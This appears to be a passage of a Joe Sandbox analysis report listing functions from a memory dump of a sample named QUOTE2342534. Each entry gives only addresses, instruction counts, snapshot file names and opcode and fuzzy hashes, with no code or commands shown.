                                                                                                                                                                                                                                                Function 0172208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                                • Instruction ID: f161a8c5f123a8b9d3de0aafbc56b135d44533fca2f5fb499c660fdf138db33e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC0128326001208BEF218E6DD884B52F767FFC4700F1544A5EE158F25BDA75CC82C3A0
                                                                                                                                                                                                                                                Function 017B6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ab1073bea08855e27c836188d57c4606f2ccf955b635b972bf2bf5adb076a975
                                                                                                                                                                                                                                                • Instruction ID: abec055873f5dccf4d9aa6ec08e8e232377c5c007b05e2e004e7ec5509a14478
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab1073bea08855e27c836188d57c4606f2ccf955b635b972bf2bf5adb076a975
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85118E726441469FD711CF58D840BE6FBB9BF9A314F188159F948CB316D732E981CBA0
                                                                                                                                                                                                                                                Function 017AC810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9f3d6de2342cc4e98fb9a1040eee1ccdecc0ec34cb90e421988484b35fd8d1b1
                                                                                                                                                                                                                                                • Instruction ID: ed1fc1eb6aa7aeb68e123e67936f3fee9a719830b305fb9941fd0680f4137f2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f3d6de2342cc4e98fb9a1040eee1ccdecc0ec34cb90e421988484b35fd8d1b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A1118B1E00209ABCB00DFA9D545AAEFBF8FF58250F10406AA905E7355D674EA01CBA4
                                                                                                                                                                                                                                                Function 017CEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4beba5b3c76e676f801d32260658ce800ec1738a61d521ed84f4051c0de663e1
                                                                                                                                                                                                                                                • Instruction ID: 407fd51d338378d1cd279b5cb987dd8b2b321c79ca6ecdee727f3ea977523d6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4beba5b3c76e676f801d32260658ce800ec1738a61d521ed84f4051c0de663e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3201B1321402119FC732AE1D844493AFFA9FF91B60B14486EE6455B252CF219E41CB91
                                                                                                                                                                                                                                                Function 0171C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                                • Instruction ID: 6bb84817a9084e29fd009a9bcde9e0f7ccdb253b30c16a1a9caff360cea3cdff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C0128322007459FEF3396ADC804EA7F7F9FFC6210F144419AA468B544DA70E401C760
                                                                                                                                                                                                                                                Function 017620F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2a7967bd701307d116b0faf70145d6bfac82a9d407d45be59a7c791e51b4ea72
                                                                                                                                                                                                                                                • Instruction ID: 0ed1758887a144e9f1700308c802cb2ba916c474da24783885fb21ce2c41e7b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a7967bd701307d116b0faf70145d6bfac82a9d407d45be59a7c791e51b4ea72
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F116D75A0120DEFCF15DF64D854EAEBBB9EB84280F004059ED0297255E635AE15CB90
                                                                                                                                                                                                                                                Function 0175E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 288fa850d59b4ba6c5f359505e83365be15e1dbfc3642e88b64404050ad6425d
                                                                                                                                                                                                                                                • Instruction ID: 0bd7276e218fa1161f44ce86ade75b57e145001c25e3c91f56274ae9e2ef4361
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 288fa850d59b4ba6c5f359505e83365be15e1dbfc3642e88b64404050ad6425d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3601A772201501BFD711AB79CD84E57F7ACFFD46547100569B60583696DB74FD01C6E0
                                                                                                                                                                                                                                                Function 017B69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0c489c6e05d8bc6609ba1287cdca2a40db737f08bba658eba8b64773805dbf42
                                                                                                                                                                                                                                                • Instruction ID: 58d77444f2d7faedd3a7a1be06562e470c13264c17d621ceef68187e667ba738
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c489c6e05d8bc6609ba1287cdca2a40db737f08bba658eba8b64773805dbf42
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7101FC322242069BD720DF69D8C8AE7FBACFF99660F114129FA5987280E7309A11C7D1
                                                                                                                                                                                                                                                Function 017AC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3c13a2ec7367edb5f3bad2f62e6b97cc95b257fe25be86b31c47567c4aa08056
                                                                                                                                                                                                                                                • Instruction ID: 201a36d1b5296f06db2905cfb57b6a92c6b64e829422196c184c51f7cbbc6a25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c13a2ec7367edb5f3bad2f62e6b97cc95b257fe25be86b31c47567c4aa08056
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD115B75A0120DABDF16EFA8C844EAEBBB9FB88240F004159BD0197344DA35EA11CB90
                                                                                                                                                                                                                                                Function 017AC97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cbd59c5985e3ef47c5b4ca3444eb52a312002028f2051d73ab060c21496aaf1c
                                                                                                                                                                                                                                                • Instruction ID: 23c0c463ee1db922d87a088bc4fa0697924a17cc99b8b870252f227826696f10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbd59c5985e3ef47c5b4ca3444eb52a312002028f2051d73ab060c21496aaf1c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A61179B16183089FC700DF69D44595BFBF8EF98310F00451AB998D7395E630E900CB92
                                                                                                                                                                                                                                                Function 017ACA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c0af8262d5bd9bb570f4885a2c5a123df84bae418410ce381db3283ec22b4aa9
                                                                                                                                                                                                                                                • Instruction ID: c7c807705bbb777419382a14e49431d46182aa75e92ddb3cff8cb5182d17dc5a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0af8262d5bd9bb570f4885a2c5a123df84bae418410ce381db3283ec22b4aa9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E1179B16183089FC310DF69D44595BFBF8FF99350F00851AB958D73A4E630E900CB92
                                                                                                                                                                                                                                                Function 017F4A80 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                                                                                • Instruction ID: fa9f673619d72207140294b73794ef857bd52295e1f790ec9f3fb9a5b9a271fc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5201D432200A059FDB219A69D844F97FBEAFBC5210F08481DE7538B754DAB0F984C794
                                                                                                                                                                                                                                                Function 0173E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                                • Instruction ID: c623d940e8c3f5f052a2afd0865b5c6415671946b6a7636991a0337fe9d1f287
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0018F322015849FE722871DCA48F26FBD8EF85764F1904A1FA05CB692DA39DC40CA21
                                                                                                                                                                                                                                                Function 0171826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 068e6ee9499eff1233581a679f8af6cdb8604b09b01ac9128919b0508c10dc8c
                                                                                                                                                                                                                                                • Instruction ID: 1aaeaac5c1aaff8e66f6a53c612770e6f739830d1e2a7e43cfe896a6cdaa6571
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 068e6ee9499eff1233581a679f8af6cdb8604b09b01ac9128919b0508c10dc8c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0501D432704505DBD715DF6DDC049AAFBA8EF84620F554069AA01D7748DE20DD01C691
                                                                                                                                                                                                                                                Function 017CEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: b4f1436bb40a72dcf6ad190ca7f237cc3ed2169eed029c05268ce02366228df4
                                                                                                                                                                                                                                                • Instruction ID: 9643851afc86920bee7aeb505b05d1b2fd716732fee28613690e753983e23e44
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4f1436bb40a72dcf6ad190ca7f237cc3ed2169eed029c05268ce02366228df4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E018F72280601AFD3325E19D840F12FBACEF55F60F15482EB7069F395DAB1A9808B64
                                                                                                                                                                                                                                                Function 01722582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 413bc9db31fd2d50276a41f944f5f0e90724df6b13a8614a84f82354d33fc0e7
                                                                                                                                                                                                                                                • Instruction ID: 81e14436c8fc2b617fb630c0be8e8e3f5ff75fa268aa972dde71537a57545851
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 413bc9db31fd2d50276a41f944f5f0e90724df6b13a8614a84f82354d33fc0e7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F0F433641A20B7C7319B5B8D54F07FEA9EBC8A90F148068E6159B641CA30ED02CAB0
                                                                                                                                                                                                                                                Function 0174C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                                • Instruction ID: 019cd12b3c5105ac28fad1716bfe4367ee017775113e331d62d091b4e8a82436
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F0C2B2600611ABD329CF4DDC40E57FBEEDBD5A80F048128A605CB220EA31DD04CB90
                                                                                                                                                                                                                                                Function 0171C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                                • Instruction ID: 217922703f6ab6ed5de3c0742766ab48d9c46137f9e93039b42e1f895cd3b75b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BF0FC332846339BD73316DD4844B2BE9A59FD5A64F190035E3059B64CC9648D0296D2
                                                                                                                                                                                                                                                Function 0175CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                                • Instruction ID: d968c339aa1af2c8bc1be23335b240b4fdf5c8bce0b0b2e360467d5080d0ca01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD01D1322006899BE7339A1DD809F59FF9CEF82750F0840A5FE048B6A2D6B9C940C211
                                                                                                                                                                                                                                                Function 017F61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ec91811768f02e0dc22296ed77c0ffd2239f86bf82693c2e742c81600dfa52eb
                                                                                                                                                                                                                                                • Instruction ID: 997b6274db155394ba407b4ce512b1698fcab90bb81a88d9fc1a5f79fa860b5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec91811768f02e0dc22296ed77c0ffd2239f86bf82693c2e742c81600dfa52eb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2014F71A102499BDB04DFA9D445AEEFBF8BF58314F14405AF905E7380D774EA01CB94
                                                                                                                                                                                                                                                Function 017A63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                • Instruction ID: 2133fff88e108d98b9560dd47fb93b720d36abd221a950d651d3f203b2ac8da8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F01D7220001DBFEF019F94DD80DAFBB7EEB99298B144225FA1192160D635DE21ABA0
                                                                                                                                                                                                                                                Function 017AA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 506e829eefe733ea03986b578c3505c6bcf582bff51d7aef08bf5150777772a9
                                                                                                                                                                                                                                                • Instruction ID: cf2c4790c0fa310b9fb01b97be5766f6b22d7eb874b5402fe392d204fd253b5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 506e829eefe733ea03986b578c3505c6bcf582bff51d7aef08bf5150777772a9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7018936100209ABCF129F84D840EDA7F66FB8C654F058201FE1866220C336D970EF81
                                                                                                                                                                                                                                                Function 0171C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 864744d2431f03a152796738a1d54b9740cc459c63fe530e657766a03ba76319
                                                                                                                                                                                                                                                • Instruction ID: 138d7eee5fe1ac6e456812b2190f475259e058310ffa9e14e9e50d25e6044bb7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 864744d2431f03a152796738a1d54b9740cc459c63fe530e657766a03ba76319
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBF024B12C42415BF7129AAD8C05F23B2A6E7D0661F65806AEB058F2C9EE70DC0183A4
                                                                                                                                                                                                                                                Function 0175656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 08ed9248b2205344f0a3374d06489690e5895445cd5dac81285ae1dfbea11aa9
                                                                                                                                                                                                                                                • Instruction ID: f2ef92e5e7ba582ce16bfa975856cccacd41821848e1e274f1616e9dee0e9c43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08ed9248b2205344f0a3374d06489690e5895445cd5dac81285ae1dfbea11aa9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4001A4702406859BF7729B3CDD5CF25B7A8BB81B48FA80190BE02DB6D6D778D542C610
                                                                                                                                                                                                                                                Function 017C437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
